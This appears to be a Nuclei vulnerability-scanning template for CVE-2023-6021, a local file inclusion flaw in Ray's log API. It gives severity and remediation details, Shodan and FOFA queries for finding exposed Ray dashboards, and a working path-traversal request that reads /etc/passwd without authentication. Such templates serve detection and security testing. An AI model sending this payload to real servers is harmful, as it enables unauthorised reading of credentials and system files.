Description
LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.
LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.
id: CVE-2023-6021
info:
name: Ray API - Local File Inclusion
author: byt3bl33d3r
severity: high
description: |
LFI in Ray's log API endpoint allows attackers to read any file on the server without authentication.
impact: |
Unauthenticated attackers can read any file on the server via the log API endpoint, potentially accessing sensitive configuration files, credentials, and application data.
remediation: |
Update Ray to a patched version that properly validates file paths in the logs endpoint.
reference:
- https://huntr.com/bounties/5039c045-f986-4cbc-81ac-370fe4b0d3f8/
- https://nvd.nist.gov/vuln/detail/CVE-2023-6021
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-6021
cwe-id: CWE-22,CWE-29
epss-score: 0.37076
epss-percentile: 0.98438
cpe: cpe:2.3:a:ray_project:ray:-:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: ray_project
product: ray
shodan-query:
- html:"Ray Dashboard"
- http.favicon.hash:463802404
- http.html:"ray dashboard"
fofa-query:
- body="ray dashboard"
- icon_hash=463802404
tags: cve,cve2023,lfi,ray,oos,ray_project,vuln
http:
- method: GET
path:
- "{{BaseURL}}/nodes?view=summary"
- "{{BaseURL}}/api/v0/logs/file?node_id={{nodeid}}&filename=../../../../../etc%2fpasswd&lines=50000"
matchers-condition: and
matchers:
- type: regex
part: body_2
regex:
- "root:.*:0:0:"
- type: word
part: header_2
words:
- "text/plain"
- "aiohttp"
condition: and
- type: status
status:
- 200
extractors:
- type: json
part: body
internal: true
name: nodeid
json:
- '..|objects|.nodeId//empty[0]'
# digest: 490a0046304402206f279399ba02091165f98a2aff23a96a3a26dca674a2a679000b8cfffd9637d702206cf5564379cdaa513e63af46047a188e47a27d929fbc303e4af40ce9f87d1391:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.